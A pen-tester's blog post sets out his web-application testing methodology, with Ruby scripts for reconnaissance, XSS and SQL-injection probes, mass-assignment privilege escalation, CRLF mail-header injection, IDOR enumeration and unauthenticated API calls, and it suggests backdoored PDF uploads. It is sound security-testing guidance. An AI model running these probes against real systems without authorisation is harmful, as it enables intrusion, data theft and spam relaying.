I'm a RoR developer who has gone pen-testing for the last couple of months. Clients range from smallish web portals to large multi-national financial institutions. So far I've had a success rate well above 85%.
This post reflects upon my modus operandi. It contains a high-level view of how I work: while the specific techniques change, the overall frame of mind stays the same, so I consider the latter more important than the former. I also hope for feedback regarding techniques and tools.
Preparation
First of all, open a text editor: I don't care if it's vim, Emacs, TextMate or OpenOffice Writer, just open one. Capture everything and add it to the document. Take screenshots. This might seem tedious at first, but you'll need this information for your final client report. I'm currently using OpenOffice for this. If you have a good template for this (preferably in something that works well with a VCS), feel free to send it to me!
Then get the client's written consent for the tests and protect yourself against any claim for compensation in case of service downtime. Also make sure that the website is actually owned by your client. I'm sometimes reminded of an incident three or four years ago: a friend of mine lost his keys in the middle of the night, called a locksmith and got his flat opened for 100 Euros without showing any sort of ID. At least it was his flat.
Reconnaissance
First of all, think about your client: what data is dear to them? How could they be embarrassed publicly? How could I, as an attacker, benefit from taking over the client's website? Can I steal money by capturing the advertisement subsystem or by selling user data?
I usually start reconnaissance with a simple "nmap -A" scan and then point my web browser at the web application itself. Note every software version you find in your lab document, then check whether there are known vulnerabilities. I'm using cvedetails for this – actually I have a small Ruby script that automates some of my searches. Theoretically it should be possible to use nmap NSE to fully automate this; if anyone has a script for doing this, please contact me.
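As an illustration of what such an automation script can look like (this is a minimal sketch, not my actual script; the product/version list is made up and you'd fill it from your own nmap output, and it simply builds search queries rather than scraping cvedetails directly):

```ruby
#!/usr/bin/env ruby
# Rough sketch: turn noted service/version pairs into search queries for
# cvedetails. The product list is hypothetical -- fill it from your nmap -A output.
require 'cgi'

products = {
  'apache http server' => '2.2.22',
  'openssh'            => '5.9p1',
  'php'                => '5.3.10'
}

products.each do |name, version|
  query = CGI.escape("site:cvedetails.com #{name} #{version}")
  puts "https://www.google.com/search?q=#{query}"
end
```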
Next I check the supported SSL/TLS versions and certificates with TLSSLed.
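If you want to double-check TLSSLed's results by hand, a small Ruby sketch along these lines works too – the hostname is a placeholder and the accepted version symbols depend on your Ruby/OpenSSL build:

```ruby
#!/usr/bin/env ruby
# Sketch: ask a server which SSL/TLS protocol versions it still accepts.
require 'socket'
require 'openssl'

host = 'www.example.com'   # placeholder target
%w[SSLv3 TLSv1 TLSv1_1 TLSv1_2].each do |version|
  begin
    ctx = OpenSSL::SSL::SSLContext.new
    ctx.ssl_version = version.to_sym
    tcp = TCPSocket.new(host, 443)
    ssl = OpenSSL::SSL::SSLSocket.new(tcp, ctx)
    ssl.connect
    puts "#{version}: accepted (#{ssl.cipher.first})"
    ssl.close
  rescue => e
    puts "#{version}: rejected (#{e.class})"
  ensure
    tcp.close if tcp && !tcp.closed?
  end
end
```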
Then I compare my results with the information extracted by Acunetix – mostly because the company already owns a license. You can use whatever floats your boat: Nessus, OpenVAS, Nexpose, w3af. If you have any suggestions or experience with one of those, please comment!
The reconnaissance phase is concluded by testing for forgotten auxiliary software (think webadmin, phpMyAdmin, etc.); if I find any, I test it against a list of default and common passwords. This might sound stupid to do, but I've actually found a phpMyAdmin installation using default credentials on a client's public website – and that wasn't a small client but a multi-national company.
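Finding those forgotten installations is easy to automate; here is a minimal sketch (the paths and the host are just common guesses, and the actual password guessing is a separate step):

```ruby
#!/usr/bin/env ruby
# Sketch: probe for forgotten admin interfaces. Host and paths are assumptions.
require 'net/http'

host  = 'www.example.com'
paths = %w[/phpmyadmin/ /phpMyAdmin/ /pma/ /admin/ /webmail/]

paths.each do |path|
  res = Net::HTTP.get_response(host, path)
  puts "#{path} -> #{res.code}" unless res.code == '404'
end
```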
Don't expect to find a smoking gun during the reconnaissance phase. While you can easily find vulnerable systems in general, the chances that a given system is vulnerable are far lower. You'll mostly find DoS possibilities – not shiny at all. But still, it would be embarrassing if you missed a hole like that.
Get a Feel for the Website
In this phase I just browse through the client's web application to get a feel for it: which frameworks were used, and which code the software developers added to integrate those frameworks. Most software components are fairly secure by now, but the integration code between them isn't. I've been a software developer for over a decade now: there's always some last-minute feature that 'must' be implemented and for which there's way too little time. Search the seams and the last-minute code!
When you look at the HTML source, search for comments. I've often seen implementation notes and old code commented out with HTML comments. Somehow there seems to be a group of software developers who think that commenting out code makes it invisible.
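Grepping for comments by hand gets old quickly. A minimal sketch, assuming you have the nokogiri gem installed and with a placeholder URL:

```ruby
#!/usr/bin/env ruby
# Sketch: dump all HTML comments from a page.
require 'open-uri'
require 'nokogiri'

doc = Nokogiri::HTML(open('http://www.example.com/'))
doc.xpath('//comment()').each do |comment|
  puts comment.text.strip
  puts '-' * 40
end
```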
Currently I'm using Firefox for most of my work; there are some essential plugins: Wappalyzer for showing the used tool-kits and Live HTTP Headers for a deeper look at the communication. You can use the default Firefox web developer tools or Firebug to get a better look at the site's source code. Sometimes you need to fake your browser/user-agent id (especially for sites that only accept Internet Explorer); for this I use User Agent Switcher.
I've used Fiddler2 for analyzing the communication of Silverlight code and was rather pleasantly surprised by its output. Now I'm looking into Burp, ZAP and WebScarab. The advantage of using a transparent HTTP/S proxy would be better documentation, replay possibilities and semi-automatically generated lists of possible SQLi/XSS endpoints.
Be on the lookout for URLs that contain code resembling SQL statements. If you find any, note them for later.
Attack!
After all that reconnaissance it’s time to have some fun:
Session-Hijacking
Web applications depend upon cookies and session ids to track and identify their users. If a website transfers the session information through an insecure channel (HTTP), attackers can impersonate the given user. If there's an XSS exploit (see the later section), an attacker can also use it to extract session information. In addition, check whether session ids are regenerated during the login or logout process. There are many websites out there that re-use the same session id over and over again; if that's the case, you are able to hijack all subsequent user sessions created on that computer.
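A quick way to check the session id regeneration is to compare the cookie you get anonymously with the one you get after logging in. A rough sketch – URL, form field names and credentials are all assumptions you'd have to adapt:

```ruby
#!/usr/bin/env ruby
# Sketch: check whether the session id changes after login.
require 'net/http'
require 'uri'

login_uri = URI('http://www.example.com/login')   # placeholder

# 1. Anonymous request: note the session cookie we get handed.
pre        = Net::HTTP.get_response(login_uri)
pre_cookie = pre['Set-Cookie']

# 2. Log in while replaying that cookie, and see whether a new one is issued.
req = Net::HTTP::Post.new(login_uri.path)
req['Cookie'] = pre_cookie
req.set_form_data('username' => 'testuser', 'password' => 'testpass')
post = Net::HTTP.start(login_uri.host, login_uri.port) { |http| http.request(req) }

puts "before login: #{pre_cookie}"
puts "after  login: #{post['Set-Cookie'] || '(no new cookie -- session id was kept!)'}"
```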
What if your client does not believe you? Just give a quick demonstration using your Android phone with dSploit.
XSS
With an XSS attack you try to inject JavaScript code into a website which is then executed within the browser of another user. This code attacks the user directly or utilizes the user's elevated privileges to alter or extract information from the client's server. Easy to do. XSS attacks have been around for a long time. Why are they still viable for pen-testing? Because you can inject JavaScript almost everywhere.
Once you've found some way of injecting JS, you'll have to exploit it. You can utilize JS to replace some HTML code and deface the website, execute actions on behalf of the user (CSRF) or steal user data (including session credentials). Read Postcards from the post-XSS world for an in-depth introduction to XSS.
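A crude way to find injection points in the first place is to push a unique marker through a parameter and see whether it comes back unescaped. A minimal sketch with a made-up URL and parameter (a real test needs far more payload variations, and the proxies mentioned above generate candidate lists semi-automatically):

```ruby
#!/usr/bin/env ruby
# Sketch: crude reflected-XSS probe against a single GET parameter.
require 'net/http'
require 'uri'
require 'cgi'

marker  = "xss#{rand(100_000)}"
payload = "<script>alert('#{marker}')</script>"
uri     = URI("http://www.example.com/search?q=#{CGI.escape(payload)}")

body = Net::HTTP.get(uri)
if body.include?(payload)
  puts "parameter 'q' reflects the payload unescaped -- likely XSS"
else
  puts "payload was escaped or filtered"
end
```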
Attack Forms
Oh HTML forms, everyone loves HTML forms! Start looking for forms that lead to data manipulation. For example, if you have a form for manipulating one's user profile, search for hidden fields. Chances are there is a hidden HTML field called "user_id" or similar. Try whether you can bypass ACL systems and alter other users' data.
Programmers are lazy (at least I am), so many web frameworks allow mass assignment of objects: the content of a form is used to update a data object's attributes. Try whether you can sneak in additional parameters and change something, e.g. your user's role – this mostly works with newer, web-2.0-ish frameworks.
Essential tools for doing this sort of stuff are TamperData and Poster.
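To make the mass-assignment case concrete: below is roughly what a careless, old-style Rails update action looks like, followed by a sketch of re-submitting the profile form with one extra attribute. The model, field and URL names are made up:

```ruby
# What a careless (pre-Rails-4-style) update action often looks like:
#   def update
#     @user = User.find(params[:id])
#     @user.update_attributes(params[:user])   # takes *every* submitted attribute
#   end
#
# Attacking side: resubmit the profile form with an extra, sneaked-in field.
require 'net/http'
require 'uri'

uri = URI('http://www.example.com/users/42')         # placeholder
res = Net::HTTP.post_form(uri,
  '_method'     => 'put',                            # Rails method override
  'user[name]'  => 'Mallory',
  'user[email]' => 'mallory@example.com',
  'user[role]'  => 'admin')                          # the attribute the form never offered
puts res.code
```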
I really do like CSRF attacks: instead of attacking the client's website yourself, you get a user's browser to do all the work for you. As the user's browser is already authenticated, this bypasses all authentication. How to do this? Find a form that alters data and has no CSRF protection, create an HTML page that submits that form via JavaScript, and get a user to view that page. Combine this with an XSS vector if possible.
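A quick way to triage candidate forms is to check whether they carry any hidden anti-CSRF token at all. A rough sketch, again assuming nokogiri; the token field names are just common conventions, not a complete list:

```ruby
#!/usr/bin/env ruby
# Sketch: list forms on a page that lack an obvious anti-CSRF token.
require 'open-uri'
require 'nokogiri'

doc = Nokogiri::HTML(open('http://www.example.com/profile'))   # placeholder URL
token_names = %w[authenticity_token csrf_token _csrf __RequestVerificationToken]

doc.css('form').each do |form|
  hidden = form.css('input[type=hidden]').map { |i| i['name'] }
  next if (hidden & token_names).any?
  puts "form without CSRF token: #{form['method'] || 'GET'} #{form['action']}"
end
```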
There's a special kind of stupidity that leads to insecure 'contact me'/'mail someone' forms. If you find a contact form that allows sending seemingly constrained mails, try some CRLF injections: add '\r\n' sequences to fields that get copied into the message's mail header. If you find one of those, you'll have found an anonymous open mail/spam relay. Send some disturbing mails to your client (from his own mail address) for extra points.
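A sketch of such a CRLF test – the URL and field names are placeholders, and you'd obviously use an inbox you control as the smuggled Bcc address:

```ruby
#!/usr/bin/env ruby
# Sketch: test a contact form field for CRLF injection into the mail header.
require 'net/http'
require 'uri'

uri = URI('http://www.example.com/contact')
res = Net::HTTP.post_form(uri,
  'name'    => "Pen Tester\r\nBcc: me@my-pentest-box.example",
  'subject' => 'CRLF test',
  'message' => 'If this mail reaches the Bcc address, the form is an open relay.')
puts res.code
```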
SQL Injections
If you have found forms or URL parameters that look susceptible to SQL injection, now's the time to attack them – try the simple and easy variations yourself, and if you can't find anything, utilize sqlmap.
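The "simple and easy variations" are basically a handful of classic probes plus an eye on error messages and response sizes. A minimal sketch with a made-up URL and parameter; sqlmap does all of this far more thoroughly:

```ruby
#!/usr/bin/env ruby
# Sketch: append classic SQLi probes to a suspicious parameter and watch for
# database error messages or suspicious changes in response size.
require 'net/http'
require 'uri'
require 'cgi'

base   = 'http://www.example.com/products?id='
probes = ["1", "1'", "1' --", "1' OR '1'='1", "1 AND 1=2"]

probes.each do |probe|
  body = Net::HTTP.get(URI(base + CGI.escape(probe)))
  flag = body =~ /SQL syntax|ORA-\d+|SQLSTATE/i ? 'DB error!' : ''
  puts format('%-20s %6d bytes  %s', probe.inspect, body.length, flag)
end
```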
Investigate Charts, APIs, Upload and Download facilities
In my experience, most charting tools and download/upload facilities are added onto an existing solution and might not heed the typical ACL systems.
I've seen chart components that generated charts for a passed user id and happily accepted any possible user id; I've seen download services that not only allowed downloading the 'right' documents but rather every file on the server. It helps if you can automate your tests, so learn some Ruby or Python.
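As an example of such automation, here is a sketch that walks a range of user ids against a chart endpoint while logged in as a single low-privilege user – URL, parameter name and session cookie are placeholders:

```ruby
#!/usr/bin/env ruby
# Sketch: check whether an endpoint honours access control by requesting
# other users' ids with one low-privilege session.
require 'net/http'
require 'uri'

cookie = 'session_id=PASTE_YOUR_OWN_SESSION_HERE'

(1..50).each do |user_id|
  uri = URI("http://www.example.com/charts/revenue?user_id=#{user_id}")
  req = Net::HTTP::Get.new(uri.request_uri)
  req['Cookie'] = cookie
  res = Net::HTTP.start(uri.host, uri.port) { |http| http.request(req) }
  puts "user_id=#{user_id}: #{res.code}, #{res.body.length} bytes"
end
```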
Look out for upload functionality: if you can upload an arbitrary file and then somehow get it included or executed, you have a very large entry point into the system.
Another often-neglected attack vector are API endpoints. They might be used to connect mobile devices or Flash/Silverlight applets to the web application's business data and/or business logic. While publicly accessible, they are not openly advertised to end users and are thus often not very well tested security-wise. There seems to be a special breed of developers who believe that no one will ever talk directly to the API endpoint and who do all their access-right and permission checking within their Flash/Silverlight applets.
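Testing this is as simple as talking to the endpoint directly, without the applet and without any credentials. A minimal sketch – the endpoint path is made up, pull the real ones from your proxy logs:

```ruby
#!/usr/bin/env ruby
# Sketch: call an applet-only API endpoint directly, deliberately without any
# session cookie or API key, and see what it hands back.
require 'net/http'
require 'uri'

uri = URI('http://www.example.com/api/v1/customers/42')   # placeholder
res = Net::HTTP.get_response(uri)
puts "#{res.code} #{res.message}"
puts res.body[0, 500] if res.code == '200'
```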
Using the server as a payload distribution service
Many web applications allow uploading active content such as PDF or Word files. You can include back doors in those kinds of files – imagine what you can do with that. Almost no web application actually employs a malware scanner to check user-supplied files.
While this doesn't target the web application itself, it targets its users. It might sound like a minor point, but there are currently unpatched Adobe PDF-based exploits making the rounds and infecting computers.
Final words
Most of all: have fun. I've been a web developer for some years; now I'm doing pen testing. Mostly I'm learning to exploit all the errors that I've been guilty of making myself when under time or budgetary constraints. I'll be a better web developer after this.